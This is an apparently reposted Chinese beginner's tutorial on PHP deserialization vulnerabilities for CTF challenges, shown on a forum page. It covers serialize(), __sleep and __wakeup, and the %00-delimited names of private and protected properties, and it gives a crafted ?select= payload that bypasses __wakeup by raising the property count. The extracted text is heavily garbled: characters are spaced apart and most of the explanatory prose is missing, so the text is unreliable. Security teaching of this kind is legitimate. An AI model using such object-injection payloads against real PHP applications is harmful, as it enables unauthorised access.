搜索

[14927] 2020-01-01_PHP反序列化漏洞入门

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2020-01-01_PHP反序列化漏洞入门 P H P S c h 0 l a r   F r e e B u f   2 0 2 0 - 0 1 - 0 1       , c t f P H P P H P s e r i a l i z e ( ) C t f     c t f e r   C t f o k s e r i a l i z e ( )     s l e e p ( ) s l e e p ( ) _ _ s l e e p ( ) O : 3 : " C t f " : 3 { s : 4 : " f l a g " ; s : 1 3 : " f l a g { a b e d y u i } " ; s : 4 : " n a m e " ; s : 7 : " S c h 0 l a r " ; s : 3 : " a g e " ; s : 2 : " 1 8 " ; } O     A 3     c t f   3   s 4 f l a g s : 1 3 : " f l a g { a b e d y u i } "      
_ _ s l e e p ( ) _ _ s l e e p ( ) 使 f l a g   a g e     n a m e 访 访 访     , p r o t e c t e d % 0 0 * % 0 0 p r i v a t e % 0 0 % 0 0   P H P p u b l i c ( ) p r o t e c t e d ( ) p r i v a t e ( ) O : 3 : " C t f " : 3 : { s : 4 : " n a m e " ; s : 7 : " S c h 0 l a r " ; s : 6 : " * a g e " ; s : 2 : " 1 9 " ; s : 9 : " C t f f l a g " ; s : 8 : " g e t   f l a g " ; } s : 6 : " * a g e "   / / * % 0 0   % 0 0     6 s : 9 : " C t f f l a g "   / / c t f % 0 0   9
u n s e r i a l i z e ( )     u n s e r i a l i z e ( )     _ _ w a k e u p ( ) _ _ w a k e u p ( ) _ _ w a k e u p ( ) f l a g _ _ w a k e u p 姿 c t f c t f
1 2   w a k e u p ( )   f l a g   u r l / w w w . z i p i n d e x . p h p O : 4 : " x c t f " : 1 : { s : 4 : " f l a g " ; s : 3 : " 1 1 1 " ; } < ? p h p         i n c l u d e   ' c l a s s . p h p ' ;
c l a s s . p h p     u s e r n a m e = a d m i n     p a s s w o r d = 1 0 0       _ _ w a k e u p _ _ w a k e u p g e t   % 0 0 u r l p a y l o a d         i n c l u d e   ' c l a s s . p h p ' ;         $ s e l e c t   =   $ _ G E T [ ' s e l e c t ' ] ;         $ r e s = u n s e r i a l i z e ( @ $ s e l e c t ) ; ? > f u n c t i o n   _ _ w a k e u p ( ) {                 $ t h i s - > u s e r n a m e   =   ' g u e s t ' ; } $ a   =   n e w   N a m e ( ' a d m i n ' , 1 0 0 ) ; $ b   =   s e r i a l i z e ( $ a ) ; p r i n t _ r ( $ b ) ; O : 4 : " N a m e " : 2 : { s : 1 4 : " N a m e u s e r n a m e " ; s : 5 : " a d m i n " ; s : 1 4 : " N a m e p a s s w o r d " ; i : 1 0 0 ; } ? s e l e c t = O : 4 : " N a m e " : 3 : { s : 1 4 : " % 0 0 N a m e % 0 0 u s e r n a m e " ; s : 5 : " a d m i n " ; s : 1 4 : " % 0 0 N a m e % 0 0 p a s s w o r d " ; i : 1 0 0 ; }
* S c h 0 l a r F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理